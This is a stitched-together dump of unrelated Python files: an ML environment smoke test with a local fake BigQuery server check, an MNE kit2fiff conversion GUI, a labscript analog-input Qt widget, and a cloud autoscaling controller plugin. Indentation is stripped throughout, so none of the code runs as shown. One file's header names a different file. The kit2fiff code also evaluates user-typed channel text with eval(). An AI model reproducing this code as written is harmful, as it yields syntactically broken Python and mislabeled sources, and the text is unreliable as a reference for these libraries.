from learntools.core import binder; binder.bind(globals())
from learntools.python.ex1 import *
color="blue"
q0.check()
print("learntools ok")
# PyTorch smoke test based on http://pytorch.org/tutorials/beginner/nlp/deep_learning_tutorial.html
import torch
import torch.nn as tnn
import torch.autograd as autograd
torch.manual_seed(31337)
linear_torch = tnn.Linear(5,3)
data_torch = autograd.Variable(torch.randn(2, 5))
print(linear_torch(data_torch))
print("PyTorch ok")
import fastai
from fastai.io import get_data
print("fast.ai ok")
import numpy as np
print("Numpy imported ok")
print("Your lucky number is: " + str(np.random.randint(100)))
# Numpy must be linked to the MKL. (Occasionally, a third-party package will muck up the installation
# and numpy will be reinstalled with an OpenBLAS backing.)
from numpy.distutils.system_info import get_info
# This will throw an exception if the MKL is not linked correctly.
get_info("blas_mkl")
import pandas as pd
print("Pandas imported ok")
from sklearn import datasets
print("sklearn imported ok")
iris = datasets.load_iris()
X, y = iris.data, iris.target
from sklearn.ensemble import RandomForestClassifier
rf1 = RandomForestClassifier()
rf1.fit(X,y)
print("sklearn RandomForestClassifier: ok")
from sklearn.linear_model import LinearRegression
boston = datasets.load_boston()
X, y = boston.data, boston.target
lr1 = LinearRegression()
lr1.fit(X,y)
print("sklearn LinearRegression: ok")
from xgboost import XGBClassifier
xgb1 = XGBClassifier(n_estimators=3)
xgb1.fit(X[0:70],y[0:70])
print("xgboost XGBClassifier: ok")
import matplotlib.pyplot as plt
plt.plot(np.linspace(0,1,50), np.random.rand(50))
plt.savefig("plot1.png")
print("matplotlib.pyplot ok")
from mpl_toolkits.basemap import Basemap
print("Basemap ok")
import plotly.plotly as py
import plotly.graph_objs as go
print("plotly ok")
import theano
print("Theano ok")
import nltk
from nltk.stem import WordNetLemmatizer
print("nltk ok")
import cv2
img = cv2.imread('plot1.png',0)
print("OpenCV ok")
from skimage.io import imread
print("skimage ok")
from wordbatch.extractors import WordBag
print("wordbatch ok")
import pyfasttext
print("pyfasttext ok")
import fastText
print("fastText ok")
import mxnet
import mxnet.gluon
print("mxnet ok")
import bokeh
print("bokeh ok")
import seaborn
print("seaborn ok")
# Test BigQuery
import os
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from google.cloud import bigquery
HOSTNAME = "127.0.0.1"
PORT = 8000
URL = "http://%s:%s" % (HOSTNAME, PORT)
fake_bq_called = False
fake_bq_header_found = False
class HTTPHandler(BaseHTTPRequestHandler):
def do_HEAD(s):
s.send_response(200)
def do_GET(s):
global fake_bq_called
global fake_bq_header_found
fake_bq_called = True
fake_bq_header_found = any(k for k in s.headers if k == "X-KAGGLE-PROXY-DATA" and s.headers[k] == "test-key")
s.send_response(200)
httpd = HTTPServer((HOSTNAME, PORT), HTTPHandler)
threading.Thread(target=httpd.serve_forever).start()
client = bigquery.Client()
try:
for ds in client.list_datasets(): pass
except:
pass
httpd.shutdown()
assert fake_bq_called, "Fake server did not receive a request from the BQ client."
assert fake_bq_header_found, "X-KAGGLE-PROXY-DATA header was missing from the BQ request."
print("bigquery proxy ok")
import shap
print("shap ok")
import kmapper
print("kmapper ok")
from vowpalwabbit import pyvw
vw = pyvw.vw(quiet=True)
ex = vw.example('1 | a b c')
vw.learn(ex)
print(vw.predict(ex))
print('vowpalwabbit ok')
import essentia
print(essentia.__version__)
print("Essentia ok")
|
_kit2fiff_gui.py
|
"""Mayavi/traits GUI for converting data from KIT systems."""
# Authors: Christian Brodbeck <christianbrodbeck@nyu.edu>
#
# License: BSD (3-clause)
from collections import Counter
import os
import queue
import sys
import numpy as np
from scipy.linalg import inv
from threading import Thread
from mayavi.core.ui.mayavi_scene import MayaviScene
from mayavi.tools.mlab_scene_model import MlabSceneModel
from pyface.api import (confirm, error, FileDialog, OK, YES, information,
ProgressDialog, warning)
from traits.api import (HasTraits, HasPrivateTraits, cached_property, Instance,
Property, Bool, Button, Enum, File, Float, Int, List,
Str, Array, DelegatesTo, on_trait_change)
from traits.trait_base import ETSConfig
from traitsui.api import (View, Item, HGroup, VGroup, spring, TextEditor,
CheckListEditor, EnumEditor, Handler)
from traitsui.menu import NoButtons
from tvtk.pyface.scene_editor import SceneEditor
from ..io.constants import FIFF
from ..io._digitization import _read_dig_points, _make_dig_points
from ..io.kit.kit import (RawKIT, KIT, _make_stim_channel, _default_stim_chs,
UnsupportedKITFormat)
from ..transforms import (apply_trans, als_ras_trans,
get_ras_to_neuromag_trans, Transform)
from ..coreg import _decimate_points, fit_matched_points
from ..utils import get_config, set_config, logger, warn
from ._backend import _check_pyface_backend
from ..event import _find_events
from ._marker_gui import CombineMarkersPanel, CombineMarkersModel
from ._help import read_tooltips
from ._viewer import HeadViewController, PointObject
use_editor = CheckListEditor(cols=5, values=[(i, str(i)) for i in range(5)])
if _check_pyface_backend()[0] == 'wx':
# wx backend allows labels for wildcards
hsp_wildcard = ['Head Shape Points (*.hsp;*.txt)|*.hsp;*.txt']
elp_wildcard = ['Head Shape Fiducials (*.elp;*.txt)|*.elp;*.txt']
kit_con_wildcard = ['Continuous KIT Files (*.sqd;*.con)|*.sqd;*.con']
if sys.platform in ('win32', 'linux2'):
    # on Windows and Ubuntu, multiple wildcards do not seem to work
hsp_wildcard = ['*.hsp', '*.txt']
elp_wildcard = ['*.elp', '*.txt']
kit_con_wildcard = ['*.sqd', '*.con']
else:
hsp_wildcard = ['*.hsp;*.txt']
elp_wildcard = ['*.elp;*.txt']
kit_con_wildcard = ['*.sqd;*.con']
tooltips = read_tooltips('kit2fiff')
class Kit2FiffModel(HasPrivateTraits):
"""Data Model for Kit2Fiff conversion.
- Markers are transformed into RAS coordinate system (as are the sensor
coordinates).
- Head shape digitizer data is transformed into neuromag-like space.
"""
# Input Traits
markers = Instance(CombineMarkersModel, ())
sqd_file = File(exists=True, filter=kit_con_wildcard)
allow_unknown_format = Bool(False)
hsp_file = File(exists=True, filter=hsp_wildcard)
fid_file = File(exists=True, filter=elp_wildcard)
stim_coding = Enum(">", "<", "channel")
stim_chs = Str("")
stim_chs_array = Property(depends_on=['raw', 'stim_chs', 'stim_coding'])
stim_chs_ok = Property(depends_on='stim_chs_array')
stim_chs_comment = Property(depends_on='stim_chs_array')
stim_slope = Enum("-", "+")
stim_threshold = Float(1.)
# Marker Points
use_mrk = List(list(range(5)), desc="Which marker points to use for the "
"device head coregistration.")
# Derived Traits
mrk = Property(depends_on='markers.mrk3.points')
# Polhemus Fiducials
elp_raw = Property(depends_on=['fid_file'])
hsp_raw = Property(depends_on=['hsp_file'])
polhemus_neuromag_trans = Property(depends_on=['elp_raw'])
# Polhemus data (in neuromag space)
elp = Property(depends_on=['elp_raw', 'polhemus_neuromag_trans'])
fid = Property(depends_on=['elp_raw', 'polhemus_neuromag_trans'])
hsp = Property(depends_on=['hsp_raw', 'polhemus_neuromag_trans'])
# trans
dev_head_trans = Property(depends_on=['elp', 'mrk', 'use_mrk'])
head_dev_trans = Property(depends_on=['dev_head_trans'])
# event preview
raw = Property(depends_on='sqd_file')
misc_chs = Property(List, depends_on='raw')
misc_chs_desc = Property(Str, depends_on='misc_chs')
misc_data = Property(Array, depends_on='raw')
can_test_stim = Property(Bool, depends_on='raw')
# info
sqd_fname = Property(Str, depends_on='sqd_file')
hsp_fname = Property(Str, depends_on='hsp_file')
fid_fname = Property(Str, depends_on='fid_file')
can_save = Property(Bool, depends_on=['stim_chs_ok', 'fid',
'elp', 'hsp', 'dev_head_trans'])
# Show GUI feedback (like error messages and progress bar)
show_gui = Bool(False)
@cached_property
def _get_can_save(self):
"""Only allow saving when all or no head shape elements are set."""
if not self.stim_chs_ok:
return False
has_all_hsp = (np.any(self.dev_head_trans) and np.any(self.hsp) and
np.any(self.elp) and np.any(self.fid))
if has_all_hsp:
return True
has_any_hsp = self.hsp_file or self.fid_file or np.any(self.mrk)
return not has_any_hsp
@cached_property
def _get_can_test_stim(self):
return self.raw is not None
@cached_property
def _get_dev_head_trans(self):
if (self.mrk is None) or not np.any(self.fid):
return np.eye(4)
src_pts = self.mrk
dst_pts = self.elp
n_use = len(self.use_mrk)
if n_use < 3:
if self.show_gui:
error(None, "Estimating the device head transform requires at "
"least 3 marker points. Please adjust the markers used.",
"Not Enough Marker Points")
return
elif n_use < 5:
src_pts = src_pts[self.use_mrk]
dst_pts = dst_pts[self.use_mrk]
trans = fit_matched_points(src_pts, dst_pts, out='trans')
return trans
@cached_property
def _get_elp(self):
if self.elp_raw is None:
return np.empty((0, 3))
pts = self.elp_raw[3:8]
pts = apply_trans(self.polhemus_neuromag_trans, pts)
return pts
@cached_property
def _get_elp_raw(self):
if not self.fid_file:
return
try:
pts = _read_dig_points(self.fid_file)
if len(pts) < 8:
raise ValueError("File contains %i points, need 8" % len(pts))
except Exception as err:
if self.show_gui:
error(None, str(err), "Error Reading Fiducials")
self.reset_traits(['fid_file'])
raise
else:
return pts
@cached_property
def _get_fid(self):
if self.elp_raw is None:
return np.empty((0, 3))
pts = self.elp_raw[:3]
pts = apply_trans(self.polhemus_neuromag_trans, pts)
return pts
@cached_property
def _get_fid_fname(self):
if self.fid_file:
return os.path.basename(self.fid_file)
else:
return '-'
@cached_property
def _get_head_dev_trans(self):
return inv(self.dev_head_trans)
@cached_property
def _get_hsp(self):
if (self.hsp_raw is None) or not np.any(self.polhemus_neuromag_trans):
return np.empty((0, 3))
else:
pts = apply_trans(self.polhemus_neuromag_trans, self.hsp_raw)
return pts
@cached_property
def _get_hsp_fname(self):
if self.hsp_file:
return os.path.basename(self.hsp_file)
else:
return '-'
@cached_property
def _get_hsp_raw(self):
fname = self.hsp_file
if not fname:
return
try:
pts = _read_dig_points(fname)
n_pts = len(pts)
if n_pts > KIT.DIG_POINTS:
msg = ("The selected head shape contains {n_in} points, "
"which is more than the recommended maximum ({n_rec}). "
"The file will be automatically downsampled, which "
"might take a while. A better way to downsample is "
"using FastScan.".
format(n_in=n_pts, n_rec=KIT.DIG_POINTS))
if self.show_gui:
information(None, msg, "Too Many Head Shape Points")
pts = _decimate_points(pts, 5)
except Exception as err:
if self.show_gui:
error(None, str(err), "Error Reading Head Shape")
self.reset_traits(['hsp_file'])
raise
else:
return pts
@cached_property
def _get_misc_chs(self):
if not self.raw:
return
return [i for i, ch in enumerate(self.raw.info['chs']) if
ch['kind'] == FIFF.FIFFV_MISC_CH]
@cached_property
def _get_misc_chs_desc(self):
if self.misc_chs is None:
return "No SQD file selected..."
elif np.all(np.diff(self.misc_chs) == 1):
return "%i:%i" % (self.misc_chs[0], self.misc_chs[-1] + 1)
else:
return "%i... (discontinuous)" % self.misc_chs[0]
@cached_property
def _get_misc_data(self):
if not self.raw:
return
if self.show_gui:
# progress dialog with indefinite progress bar
prog = ProgressDialog(title="Loading SQD data...",
message="Loading stim channel data from SQD "
"file ...")
prog.open()
prog.update(0)
else:
prog = None
try:
data, times = self.raw[self.misc_chs]
except Exception as err:
if self.show_gui:
error(None, "Error reading SQD data file: %s (Check the "
"terminal output for details)" % str(err),
"Error Reading SQD File")
raise
finally:
if self.show_gui:
prog.close()
return data
@cached_property
def _get_mrk(self):
return apply_trans(als_ras_trans, self.markers.mrk3.points)
@cached_property
def _get_polhemus_neuromag_trans(self):
if self.elp_raw is None:
return
nasion, lpa, rpa = apply_trans(als_ras_trans, self.elp_raw[:3])
trans = get_ras_to_neuromag_trans(nasion, lpa, rpa)
return np.dot(trans, als_ras_trans)
@cached_property
def _get_raw(self):
if not self.sqd_file:
return
try:
return RawKIT(self.sqd_file, stim=None,
allow_unknown_format=self.allow_unknown_format)
except UnsupportedKITFormat as exception:
warning(
None,
"The selected SQD file is written in an old file format (%s) "
"that is not officially supported. Confirm that the results "
"are as expected. This warning is displayed only once per "
"session." % (exception.sqd_version,),
"Unsupported SQD File Format")
self.allow_unknown_format = True
return self._get_raw()
except Exception as err:
self.reset_traits(['sqd_file'])
if self.show_gui:
error(None, "Error reading SQD data file: %s (Check the "
"terminal output for details)" % str(err),
"Error Reading SQD File")
raise
@cached_property
def _get_sqd_fname(self):
if self.sqd_file:
return os.path.basename(self.sqd_file)
else:
return '-'
@cached_property
def _get_stim_chs_array(self):
if self.raw is None:
return
elif not self.stim_chs.strip():
picks = _default_stim_chs(self.raw.info)
else:
try:
picks = eval("r_[%s]" % self.stim_chs, vars(np))
if picks.dtype.kind != 'i':
raise TypeError("Need array of int")
except Exception:
return None
if self.stim_coding == '<': # Big-endian
return picks[::-1]
else:
return picks
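    # Illustration (hypothetical channel string): with stim_chs == "160:168",
    # eval("r_[160:168]", vars(np)) yields array([160, ..., 167]) of integer
    # dtype; with stim_coding == '<' the picks are returned reversed.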
@cached_property
def _get_stim_chs_comment(self):
if self.raw is None:
return ""
elif not self.stim_chs_ok:
return "Invalid!"
elif not self.stim_chs.strip():
return "Default: The first 8 MISC channels"
else:
return "Ok: %i channels" % len(self.stim_chs_array)
@cached_property
def _get_stim_chs_ok(self):
return self.stim_chs_array is not None
def clear_all(self):
"""Clear all specified input parameters."""
self.markers.clear = True
self.reset_traits(['sqd_file', 'hsp_file', 'fid_file', 'use_mrk'])
def get_event_info(self):
"""Count events with current stim channel settings.
Returns
-------
event_count : Counter
Counter mapping event ID to number of occurrences.
"""
if self.misc_data is None:
return
idx = [self.misc_chs.index(ch) for ch in self.stim_chs_array]
data = self.misc_data[idx]
if self.stim_coding == 'channel':
coding = 'channel'
else:
coding = 'binary'
stim_ch = _make_stim_channel(data, self.stim_slope,
self.stim_threshold, coding,
self.stim_chs_array)
events = _find_events(stim_ch, self.raw.first_samp, consecutive=True,
min_samples=3)
return Counter(events[:, 2])
def get_raw(self, preload=False):
"""Create a raw object based on the current model settings."""
if not self.can_save:
raise ValueError("Not all necessary parameters are set")
# stim channels and coding
if self.stim_coding == 'channel':
stim_code = 'channel'
elif self.stim_coding in '<>':
stim_code = 'binary'
else:
raise RuntimeError("stim_coding=%r" % self.stim_coding)
logger.info("Creating raw with stim=%r, slope=%r, stim_code=%r, "
"stimthresh=%r", self.stim_chs_array, self.stim_slope,
stim_code, self.stim_threshold)
raw = RawKIT(self.sqd_file, preload=preload, stim=self.stim_chs_array,
slope=self.stim_slope, stim_code=stim_code,
stimthresh=self.stim_threshold,
allow_unknown_format=self.allow_unknown_format)
if np.any(self.fid):
raw.info['dig'] = _make_dig_points(self.fid[0], self.fid[1],
self.fid[2], self.elp,
self.hsp)
raw.info['dev_head_t'] = Transform('meg', 'head',
self.dev_head_trans)
return raw
class Kit2FiffFrameHandler(Handler):
"""Check for unfinished processes before closing its window."""
def close(self, info, is_ok): # noqa: D102
if info.object.kit2fiff_panel.queue.unfinished_tasks:
msg = ("Can not close the window while saving is still in "
"progress. Please wait until all files are processed.")
title = "Saving Still in Progress"
information(None, msg, title)
return False
else:
# store configuration, but don't prevent from closing on error
try:
info.object.save_config()
except Exception as exc:
warn("Error saving GUI configuration:\n%s" % (exc,))
return True
class Kit2FiffPanel(HasPrivateTraits):
"""Control panel for kit2fiff conversion."""
model = Instance(Kit2FiffModel)
# model copies for view
use_mrk = DelegatesTo('model')
sqd_file = DelegatesTo('model')
hsp_file = DelegatesTo('model')
fid_file = DelegatesTo('model')
stim_coding = DelegatesTo('model')
stim_chs = DelegatesTo('model')
stim_chs_ok = DelegatesTo('model')
stim_chs_comment = DelegatesTo('model')
stim_slope = DelegatesTo('model')
stim_threshold = DelegatesTo('model')
# info
can_save = DelegatesTo('model')
sqd_fname = DelegatesTo('model')
hsp_fname = DelegatesTo('model')
fid_fname = DelegatesTo('model')
misc_chs_desc = DelegatesTo('model')
can_test_stim = DelegatesTo('model')
test_stim = Button(label="Find Events")
plot_raw = Button(label="Plot Raw")
# Source Files
reset_dig = Button
# Visualization
scene = Instance(MlabSceneModel)
fid_obj = Instance(PointObject)
elp_obj = Instance(PointObject)
hsp_obj = Instance(PointObject)
# Output
save_as = Button(label='Save FIFF...')
clear_all = Button(label='Clear All')
queue = Instance(queue.Queue, ())
queue_feedback = Str('')
queue_current = Str('')
queue_len = Int(0)
queue_len_str = Property(Str, depends_on=['queue_len'])
error = Str('')
view = View(
VGroup(VGroup(Item('sqd_file', label="Data",
tooltip=tooltips['sqd_file']),
Item('sqd_fname', show_label=False, style='readonly'),
Item('hsp_file', label='Digitizer\nHead Shape',
tooltip=tooltips['hsp_file']),
Item('hsp_fname', show_label=False, style='readonly'),
Item('fid_file', label='Digitizer\nFiducials',
tooltip=tooltips['fid_file']),
Item('fid_fname', show_label=False, style='readonly'),
Item('reset_dig', label='Clear Digitizer Files',
show_label=False),
Item('use_mrk', editor=use_editor, style='custom',
tooltip=tooltips['use_mrk']),
label="Sources", show_border=True),
VGroup(Item('misc_chs_desc', label='MISC Channels',
style='readonly'),
Item('stim_slope', label="Event Onset", style='custom',
tooltip=tooltips['stim_slope'],
editor=EnumEditor(
values={'+': '2:Peak (0 to 5 V)',
'-': '1:Trough (5 to 0 V)'},
cols=2)),
Item('stim_coding', label="Value Coding", style='custom',
editor=EnumEditor(values={'>': '1:little-endian',
'<': '2:big-endian',
'channel': '3:Channel#'},
cols=3),
tooltip=tooltips["stim_coding"]),
Item('stim_chs', label='Channels', style='custom',
tooltip=tooltips["stim_chs"],
editor=TextEditor(evaluate_name='stim_chs_ok',
auto_set=True)),
Item('stim_chs_comment', label='Evaluation',
style='readonly', show_label=False),
Item('stim_threshold', label='Threshold',
tooltip=tooltips['stim_threshold']),
HGroup(Item('test_stim', enabled_when='can_test_stim',
show_label=False),
Item('plot_raw', enabled_when='can_test_stim',
show_label=False),
show_labels=False),
label='Events', show_border=True),
HGroup(Item('save_as', enabled_when='can_save'), spring,
'clear_all', show_labels=False),
Item('queue_feedback', show_label=False, style='readonly'),
Item('queue_current', show_label=False, style='readonly'),
Item('queue_len_str', show_label=False, style='readonly')
)
)
def __init__(self, *args, **kwargs): # noqa: D102
super(Kit2FiffPanel, self).__init__(*args, **kwargs)
# setup save worker
def worker(): # noqa: D102
while True:
raw, fname = self.queue.get()
basename = os.path.basename(fname)
self.queue_len -= 1
self.queue_current = 'Processing: %s' % basename
# task
try:
raw.save(fname, overwrite=True)
except Exception as err:
self.error = str(err)
res = "Error saving: %s"
else:
res = "Saved: %s"
# finalize
self.queue_current = ''
self.queue_feedback = res % basename
self.queue.task_done()
t = Thread(target=worker)
t.daemon = True
t.start()
# setup mayavi visualization
self.fid_obj = PointObject(scene=self.scene, color=(0.1, 1., 0.1),
point_scale=5e-3, name='Fiducials')
self._update_fid()
self.elp_obj = PointObject(scene=self.scene,
color=(0.196, 0.196, 0.863),
point_scale=1e-2, opacity=.2, name='ELP')
self._update_elp()
self.hsp_obj = PointObject(scene=self.scene, color=(0.784,) * 3,
point_scale=2e-3, name='HSP')
self._update_hsp()
self.scene.camera.parallel_scale = 0.15
self.scene.mlab.view(0, 0, .15)
@on_trait_change('model:fid,model:head_dev_trans')
def _update_fid(self):
if self.fid_obj is not None:
self.fid_obj.points = apply_trans(self.model.head_dev_trans,
self.model.fid)
@on_trait_change('model:hsp,model:head_dev_trans')
def _update_hsp(self):
if self.hsp_obj is not None:
self.hsp_obj.points = apply_trans(self.model.head_dev_trans,
self.model.hsp)
@on_trait_change('model:elp,model:head_dev_trans')
def _update_elp(self):
if self.elp_obj is not None:
self.elp_obj.points = apply_trans(self.model.head_dev_trans,
self.model.elp)
def _clear_all_fired(self):
self.model.clear_all()
@cached_property
def _get_queue_len_str(self):
if self.queue_len:
return "Queue length: %i" % self.queue_len
else:
return ''
def _plot_raw_fired(self):
self.model.raw.plot()
def _reset_dig_fired(self):
self.reset_traits(['hsp_file', 'fid_file'])
def _save_as_fired(self):
# create raw
try:
raw = self.model.get_raw()
except Exception as err:
error(None, str(err), "Error Creating KIT Raw")
raise
# find default path
stem, _ = os.path.splitext(self.sqd_file)
if not stem.endswith('raw'):
stem += '-raw'
default_path = stem + '.fif'
# save as dialog
dlg = FileDialog(action="save as",
wildcard="fiff raw file (*.fif)|*.fif",
default_path=default_path)
dlg.open()
if dlg.return_code != OK:
return
fname = dlg.path
if not fname.endswith('.fif'):
fname += '.fif'
if os.path.exists(fname):
            answer = confirm(None, "The file %r already exists. Should it "
                             "be replaced?" % fname, "Overwrite File?")
if answer != YES:
return
self.queue.put((raw, fname))
self.queue_len += 1
def _test_stim_fired(self):
try:
events = self.model.get_event_info()
except Exception as err:
error(None, "Error reading events from SQD data file: %s (Check "
"the terminal output for details)" % str(err),
"Error Reading events from SQD file")
raise
if len(events) == 0:
information(None, "No events were found with the current "
"settings.", "No Events Found")
else:
lines = ["Events found (ID: n events):"]
for id_ in sorted(events):
lines.append("%3i: \t%i" % (id_, events[id_]))
information(None, '\n'.join(lines), "Events in SQD File")
class Kit2FiffFrame(HasTraits):
"""GUI for interpolating between two KIT marker files."""
model = Instance(Kit2FiffModel)
scene = Instance(MlabSceneModel, ())
headview = Instance(HeadViewController)
marker_panel = Instance(CombineMarkersPanel)
kit2fiff_panel = Instance(Kit2FiffPanel)
view = View(HGroup(VGroup(Item('marker_panel', style='custom'),
show_labels=False),
VGroup(Item('scene',
editor=SceneEditor(scene_class=MayaviScene),
dock='vertical', show_label=False),
VGroup(Item('headview', style='custom'),
show_labels=False),
),
VGroup(Item('kit2fiff_panel', style='custom'),
show_labels=False),
show_labels=False,
),
handler=Kit2FiffFrameHandler(),
height=700, resizable=True, buttons=NoButtons)
def __init__(self, *args, **kwargs): # noqa: D102
logger.debug(
"Initializing Kit2fiff-GUI with %s backend", ETSConfig.toolkit)
HasTraits.__init__(self, *args, **kwargs)
# can't be static method due to Traits
def _model_default(self):
# load configuration values and make sure they're valid
config = get_config(home_dir=os.environ.get('_MNE_FAKE_HOME_DIR'))
stim_threshold = 1.
if 'MNE_KIT2FIFF_STIM_CHANNEL_THRESHOLD' in config:
try:
stim_threshold = float(
config['MNE_KIT2FIFF_STIM_CHANNEL_THRESHOLD'])
except ValueError:
warn("Ignoring invalid configuration value for "
"MNE_KIT2FIFF_STIM_CHANNEL_THRESHOLD: %r (expected "
"float)" %
(config['MNE_KIT2FIFF_STIM_CHANNEL_THRESHOLD'],))
stim_slope = config.get('MNE_KIT2FIFF_STIM_CHANNEL_SLOPE', '-')
if stim_slope not in '+-':
warn("Ignoring invalid configuration value for "
"MNE_KIT2FIFF_STIM_CHANNEL_THRESHOLD: %s (expected + or -)" %
stim_slope)
stim_slope = '-'
stim_coding = config.get('MNE_KIT2FIFF_STIM_CHANNEL_CODING', '>')
if stim_coding not in ('<', '>', 'channel'):
warn("Ignoring invalid configuration value for "
"MNE_KIT2FIFF_STIM_CHANNEL_CODING: %s (expected <, > or "
"channel)" % stim_coding)
stim_coding = '>'
return Kit2FiffModel(
stim_chs=config.get('MNE_KIT2FIFF_STIM_CHANNELS', ''),
stim_coding=stim_coding,
stim_slope=stim_slope,
stim_threshold=stim_threshold,
show_gui=True)
def _headview_default(self):
return HeadViewController(scene=self.scene, scale=160, system='RAS')
def _kit2fiff_panel_default(self):
return Kit2FiffPanel(scene=self.scene, model=self.model)
def _marker_panel_default(self):
return CombineMarkersPanel(scene=self.scene, model=self.model.markers,
trans=als_ras_trans)
def save_config(self, home_dir=None):
"""Write configuration values."""
set_config('MNE_KIT2FIFF_STIM_CHANNELS', self.model.stim_chs, home_dir,
set_env=False)
set_config('MNE_KIT2FIFF_STIM_CHANNEL_CODING', self.model.stim_coding,
home_dir, set_env=False)
set_config('MNE_KIT2FIFF_STIM_CHANNEL_SLOPE', self.model.stim_slope,
home_dir, set_env=False)
set_config('MNE_KIT2FIFF_STIM_CHANNEL_THRESHOLD',
str(self.model.stim_threshold), home_dir, set_env=False)
|
analoginput.py
|
#####################################################################
# #
# analogoutput.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the labscript suite (see #
# http://labscriptsuite.org) and is licensed under the Simplified #
# BSD License. See the license.txt file in the root of the project #
# for the full license. #
# #
#####################################################################
import sys
from qtutils.qt.QtCore import *
from qtutils.qt.QtGui import *
from qtutils.qt.QtWidgets import *
from qtutils import *
import qtutils.icons
import threading
import time
from labscript_utils.qtwidgets.InputPlotWindow import PlotWindow
class AnalogInput(QWidget):
def __init__(self, device_name, hardware_name, connection_name='-', display_name=None, horizontal_alignment=False, parent=None):
QWidget.__init__(self, parent)
self.plot = None
self._device_name = device_name
self._connection_name = connection_name
self._hardware_name = hardware_name
self.win = None
label_text = (self._hardware_name + '\n' + self._connection_name) if display_name is None else display_name
self._label = QLabel(label_text)
self._label.setAlignment(Qt.AlignCenter)
self._label.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Minimum)
self._line_edit = QLineEdit()
self._line_edit.setSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Minimum)
self._line_edit.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self._line_edit.setMaximumWidth(55)
self._line_edit.setAlignment(Qt.AlignRight)
self._line_edit.setReadOnly(True)
self._plot_btn = QPushButton()
self._plot_btn.setIcon(QIcon(':/qtutils/fugue/chart-up'))
self._plot_btn.clicked.connect(self.open_plot_window)
self._value_changed_function = None
self.setSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Minimum)
# Create widgets and layouts
if horizontal_alignment:
self._layout = QHBoxLayout(self)
self._layout.addWidget(self._label)
self._layout.addWidget(self._line_edit)
self._layout.addWidget(self._plot_btn)
else:
self._layout = QGridLayout(self)
self._layout.setVerticalSpacing(0)
self._layout.setHorizontalSpacing(0)
self._layout.setContentsMargins(5, 5, 5, 5)
self._label.setSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Minimum)
self._layout.addWidget(self._label)
self._layout.addItem(QSpacerItem(0, 0, QSizePolicy.MinimumExpanding, QSizePolicy.Minimum), 0, 1)
h_widget = QWidget()
h_layout = QHBoxLayout(h_widget)
h_layout.setContentsMargins(0, 0, 0, 0)
h_layout.addWidget(self._line_edit)
self._layout.addWidget(self._label, 0, 0)
self._layout.addWidget(h_widget, 1, 0)
self._layout.addWidget(self._plot_btn, 2, 0)
self._layout.addItem(QSpacerItem(0, 0, QSizePolicy.MinimumExpanding, QSizePolicy.Minimum), 1, 1)
self.set_value(None)
# The Analog input object that is in charge of this button
self._AI = None
    # Setting and getting methods for the Analog Input object in charge of this widget
def set_AI(self, AI, notify_old_AI=True, notify_new_AI=True):
        # If we are setting a new AI, remove this widget from the old one (if it isn't None) and add it to the new one (if it isn't None)
if AI != self._AI:
if self._AI is not None and notify_old_AI:
self._AI.remove_widget(self, False)
if AI is not None and notify_new_AI:
AI.add_widget(self)
        # Store a reference to the analog input object
self._AI = AI
def get_AI(self):
return self._AI
@inmain_decorator(True)
def set_value(self, value):
if value is not None:
text = "%0.4f" % value
else:
text = "no value"
self._line_edit.setText(text)
def _check_plot_window(self):
while self.win is not None:
time.sleep(0.1)
if self.from_child.get() == "closed":
self.win = None
self.to_child = None
self.from_child = None
def open_plot_window(self):
if self.win is None:
self.win = PlotWindow()
self.to_child, self.from_child = self.win.start(self._connection_name, self._hardware_name, self._device_name)
check_plot_window_thread = threading.Thread(target=self._check_plot_window)
check_plot_window_thread.daemon = True
check_plot_window_thread.start()
else:
self.to_child.put('focus')
# A simple test!
if __name__ == '__main__':
qapplication = QApplication(sys.argv)
window = QWidget()
layout = QVBoxLayout(window)
button = AnalogInput('AI1', 'AI1')
layout.addWidget(button)
window.show()
sys.exit(qapplication.exec_())
|
plugin.py
|
# Copyright (c) 2017 LSD - UFCG.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import time
from controller.plugins.controller.basic.alarm import BasicAlarm
from controller.plugins.controller.base import Controller
from controller.utils.logger import Log, configure_logging
# FIXME: This class does not work with the current scaler format.
# It should be removed in the future.
class BasicController(Controller):
def __init__(self, metric_source, actuator, plugin_info):
# Set up logging
self.logger = Log("basic.controller.log", "controller.log")
configure_logging()
check_interval = plugin_info["check_interval"]
trigger_down = plugin_info["trigger_down"]
trigger_up = plugin_info["trigger_up"]
min_cap = plugin_info["min_cap"]
max_cap = plugin_info["max_cap"]
actuation_size = plugin_info["actuation_size"]
metric_rounding = plugin_info["metric_rounding"]
# Start alarm
self.alarm = BasicAlarm(actuator, metric_source, trigger_down,
trigger_up, min_cap, max_cap, actuation_size,
metric_rounding)
# Start up controller thread
# Create lock to access application list
self.applications_lock = threading.RLock()
self.applications = {}
self.controller = _BasicControllerThread(
self.applications, self.applications_lock, self.alarm,
check_interval)
self.controller_thread = threading.Thread(target=self.controller.start)
self.controller_thread.start()
def start_application_scaling(self, app_id, plugin_info):
self.logger.log("Adding application id: %s" % (app_id))
# Acquire lock and add application
with self.applications_lock:
self.applications[app_id] = plugin_info
def stop_application_scaling(self, app_id):
# Acquire lock and remove application
with self.applications_lock:
if app_id in self.applications.keys():
self.logger.log("Removing application id: %s" % (app_id))
self.applications.pop(app_id)
else:
self.logger.log("Application %s not found" % (app_id))
def stop_controller(self):
self.controller.running = False
def status(self):
return ""
class _BasicControllerThread():
def __init__(self, applications, applications_lock, alarm, check_interval):
self.logger = Log("basic.controller_thread.log", "controller.log")
configure_logging()
self.applications = applications
self.applications_lock = applications_lock
self.alarm = alarm
self.check_interval = check_interval
self.running = True
def start(self):
self.logger.log("Starting controller thread")
while self.running:
# acquire lock, check applications and wait
with self.applications_lock:
self.logger.log("Monitoring applications: %s" %
(str(self.applications.keys())))
applications_ids = self.applications.keys()
# for each application check state
for application_id in applications_ids:
instances = self.applications[application_id]["instances"]
self.logger.log("Checking application:%s|instances:%s" % (
application_id, instances))
self.alarm.check_application_state(
application_id, instances)
